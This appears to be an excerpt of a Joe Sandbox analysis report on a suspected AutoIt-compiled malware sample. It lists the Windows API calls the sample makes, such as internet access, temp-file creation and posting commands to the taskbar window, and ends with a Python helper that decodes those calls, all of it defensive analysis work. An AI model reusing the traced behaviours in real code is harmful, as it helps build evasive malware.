                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00914634
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: '
                                      • API String ID: 3850602802-1997036262
                                      APIs
                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0091327C
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00913287
                                      Strings
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: Combobox
                                      • API String ID: 3850602802-2096851135
                                      APIs
                                        • Part of subcall function 0088600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0088604C
                                        • Part of subcall function 0088600E: GetStockObject.GDI32(00000011), ref: 00886060
                                        • Part of subcall function 0088600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0088606A
                                      • GetWindowRect.USER32(00000000,?), ref: 0091377A
                                      • GetSysColor.USER32(00000012), ref: 00913794
                                      Strings
                                      Similarity
                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                      • String ID: static
                                      • API String ID: 1983116058-2160076837
                                      APIs
                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 008FCD7D
                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 008FCDA6
                                      Strings
                                      Similarity
                                      • API ID: Internet$OpenOption
                                      • String ID: <local>
                                      • API String ID: 942729171-4266983199
                                      APIs
                                      • GetWindowTextLengthW.USER32(00000000), ref: 009134AB
                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 009134BA
                                      Strings
                                      Similarity
                                      • API ID: LengthMessageSendTextWindow
                                      • String ID: edit
                                      • API String ID: 2978978980-2167791130
                                      APIs
                                        • Part of subcall function 00889CB3: _wcslen.LIBCMT ref: 00889CBD
                                      • CharUpperBuffW.USER32(?,?,?), ref: 008E6CB6
                                      • _wcslen.LIBCMT ref: 008E6CC2
                                      Strings
                                      Similarity
                                      • API ID: _wcslen$BuffCharUpper
                                      • String ID: STOP
                                      • API String ID: 1256254125-2411985666
                                      APIs
                                        • Part of subcall function 00889CB3: _wcslen.LIBCMT ref: 00889CBD
                                        • Part of subcall function 008E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 008E3CCA
                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 008E1D4C
                                      Strings
                                      Similarity
                                      • API ID: ClassMessageNameSend_wcslen
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 624084870-1403004172
                                      APIs
                                        • Part of subcall function 00889CB3: _wcslen.LIBCMT ref: 00889CBD
                                        • Part of subcall function 008E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 008E3CCA
                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 008E1C46
                                      Strings
                                      Similarity
                                      • API ID: ClassMessageNameSend_wcslen
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 624084870-1403004172
                                      APIs
                                        • Part of subcall function 00889CB3: _wcslen.LIBCMT ref: 00889CBD
                                        • Part of subcall function 008E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 008E3CCA
                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 008E1CC8
                                      Strings
                                      Similarity
                                      • API ID: ClassMessageNameSend_wcslen
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 624084870-1403004172
                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: _wcslen
                                      • String ID: 3, 3, 16, 1
                                      • API String ID: 176396367-3042988571
                                      APIs
                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 008E0B23
                                      Strings
                                      Similarity
                                      • API ID: Message
                                      • String ID: AutoIt$Error allocating memory.
                                      • API String ID: 2030045667-4017498283
                                      APIs
                                        • Part of subcall function 0089F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(00950A88,00000000,00950A74,008A0D71,?,?,?,0088100A), ref: 0089F7CE
                                      • IsDebuggerPresent.KERNEL32(?,?,?,0088100A), ref: 008A0D75
                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0088100A), ref: 008A0D84
                                      Strings
                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 008A0D7F
                                      Similarity
                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                      • API String ID: 55579361-631824599
                                      APIs
                                      • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 008F302F
                                      • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 008F3044
                                      Strings
                                      Similarity
                                      • API ID: Temp$FileNamePath
                                      • String ID: aut
                                      • API String ID: 3285503233-3010740371
                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: LocalTime
                                      • String ID: %.3d$X64
                                      • API String ID: 481472006-1077770165
                                      • Opcode ID: a285fa56b49a49c273eebbf2952c303f1a63fa50f4c5fe1aaa7ae68eb5c62708
                                      • Instruction ID: 50175b850b05d8bb2a962eb13cb5a376e2040ad72c5badef5c79e798a2956e84
                                      • Opcode Fuzzy Hash: a285fa56b49a49c273eebbf2952c303f1a63fa50f4c5fe1aaa7ae68eb5c62708
                                      • Instruction Fuzzy Hash: 4FD012A184830CEACF50AAD0DC45CF9B37CFB18345F548553F906D1141E634E508A761
                                      APIs
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0091232C
                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0091233F
                                        • Part of subcall function 008EE97B: Sleep.KERNEL32 ref: 008EE9F3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: FindMessagePostSleepWindow
                                      • String ID: Shell_TrayWnd
                                      • API String ID: 529655941-2988720461
                                      • Opcode ID: 1a6845b75b820609abe2eb995d42eef322d53c38acae3c4f0ca273c43968de70
                                      • Instruction ID: ecf3705ab176e1a9325e8e1e2305506606482e8d436c182372f6bb97de52c1ad
                                      • Opcode Fuzzy Hash: 1a6845b75b820609abe2eb995d42eef322d53c38acae3c4f0ca273c43968de70
                                      • Instruction Fuzzy Hash: 26D022B23E8300BBE364B370DC0FFC6BA04AB00B00F0089067705EA0D0C8F0A801CB00
                                      APIs
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0091236C
                                      • PostMessageW.USER32(00000000), ref: 00912373
                                        • Part of subcall function 008EE97B: Sleep.KERNEL32 ref: 008EE9F3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: FindMessagePostSleepWindow
                                      • String ID: Shell_TrayWnd
                                      • API String ID: 529655941-2988720461
                                      • Opcode ID: effae3d46096d56f0bd0c9c97972cd0d50e6f8654f6d161b96affb1a8b66a0bd
                                      • Instruction ID: 9dbd0f26a458e77275f534af68bbbc6ec7c26ea8b04cb29d312067ca6aec3128
                                      • Opcode Fuzzy Hash: effae3d46096d56f0bd0c9c97972cd0d50e6f8654f6d161b96affb1a8b66a0bd
                                      • Instruction Fuzzy Hash: 1ED0A9B23D83007AE264B370DC0FFC6AA04AB01B00F0089067601EA0D0C8B0A801CA04
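The two function entries above record FindWindowW on the taskbar window class Shell_TrayWnd followed by PostMessageW with message 00000111, which is WM_COMMAND (0x0111 in winuser.h). The report prints the message and parameters as raw hex, so the following is an added example, not Joe Sandbox code, that parses API lines in the printed format shown on this page and names the window message for the analyst. The sample input is the three API lines reproduced from the first entry; the regular expression over the listing format and the small WM_* table are assumptions of this example, and the meaning of the wParam value 0x197 is not stated in the report and is not decoded here.

```python
"""Decode API call lines from a Joe Sandbox function listing (added example)."""
import re
from typing import Optional

# Constructed sample: the API lines from the function entry above.
SAMPLE = [
    "• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0091232C",
    "• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0091233F",
    "  • Part of subcall function 008EE97B: Sleep.KERNEL32 ref: 008EE9F3",
]

# Assumed printed format: <api>.<MODULE>(<arg,arg,...>), ref: <hex address>
# The argument list is optional (Sleep.KERNEL32 above has none).
API_LINE = re.compile(
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Window message numbers from winuser.h; only the few needed here.
WINDOW_MESSAGES = {
    0x0010: "WM_CLOSE",
    0x0111: "WM_COMMAND",
    0x0112: "WM_SYSCOMMAND",
}

MESSAGE_APIS = ("PostMessageW", "PostMessageA", "SendMessageW", "SendMessageA")


def parse_api_line(line: str) -> Optional[dict]:
    """Split one listing line into api, module, raw args and the call site."""
    m = API_LINE.search(line)
    if not m:
        return None
    raw = m.group("args")
    args = [a.strip() for a in raw.split(",")] if raw else []
    return {
        "api": m.group("api"),
        "module": m.group("module"),
        "args": args,          # strings stay as printed, numbers stay hex text
        "ref": int(m.group("ref"), 16),
    }


def decode_message(entry: dict) -> Optional[dict]:
    """For Post/SendMessage calls, name the message and expose wParam/lParam."""
    if entry["api"] not in MESSAGE_APIS:
        return None
    args = entry["args"]
    if len(args) < 2:
        # The report sometimes prints only the first argument (see the
        # second entry above); report that the message is unknown.
        return {"msg": None, "wparam": None, "lparam": None}
    msg = int(args[1], 16)
    return {
        "msg": WINDOW_MESSAGES.get(msg, f"0x{msg:04X}"),
        "wparam": int(args[2], 16) if len(args) > 2 else None,
        "lparam": int(args[3], 16) if len(args) > 3 else None,
    }


def taskbar_commands(lines) -> list:
    """Return wParam values of WM_COMMAND posted after a FindWindow on Shell_TrayWnd."""
    found = []
    tray_seen = False
    for entry in filter(None, map(parse_api_line, lines)):
        if entry["api"].startswith("FindWindow") and entry["args"][:1] == ["Shell_TrayWnd"]:
            tray_seen = True
            continue
        decoded = decode_message(entry)
        if tray_seen and decoded and decoded["msg"] == "WM_COMMAND":
            found.append(decoded["wparam"])
    return found


if __name__ == "__main__":
    for line in SAMPLE:
        entry = parse_api_line(line)
        print(entry, decode_message(entry))
    print("WM_COMMAND wParams sent to Shell_TrayWnd:",
          [hex(w) for w in taskbar_commands(SAMPLE)])
```

Run it on the lines of a function entry copied from the report; `taskbar_commands` returns the raw wParam values so the analyst can look them up against the shell's command IDs rather than trusting a guessed label.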